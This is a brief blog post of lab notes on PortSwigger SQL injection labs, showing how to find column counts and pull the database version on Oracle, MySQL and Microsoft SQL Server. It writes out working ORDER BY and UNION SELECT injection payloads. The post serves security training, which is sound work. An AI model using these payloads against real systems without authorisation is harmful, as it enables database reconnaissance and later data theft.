3. SQL Injection - Examining the Database - Versions
Examining the type of database and its details like version, how many tables and what the table holds is useful.
Cheat Sheet SQL Injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
Do SQL Injection to retrieve the database version.
(ORACLE)
Lab-07 - SQL injection attack, querying the database type and version on Oracle |
(1) Determine the number of columns |
' order by 3 -- -> internal server error |
3 - 1 = 2 |
(2) Determine the data types of the columns |
' UNION SELECT 'a', 'a' from DUAL-- -> Oracle database |
(3) Output the version of the database |
' UNION SELECT banner, NULL from v$version-- |
SELECT banner FROM v$version |
(Microsoft/MySQL)
Using BURP Intruder and Repeater
Lab 08 - SQL injection attack, querying the database type and version on MySQL and Microsoft |
SQL Injection - Product Category |
End Goal - display the database version |
Analysis: |
(1) Find number of columns |
' order by 3# -> internal server error |
3 - 1 = 2 |
(2) Figure out which columns contain text |
' UNION SELECT 'a', 'a'# |
(3) Output the version |
' UNION SELECT @@version, NULL# |
SELECT @@version |
Comments
Post a Comment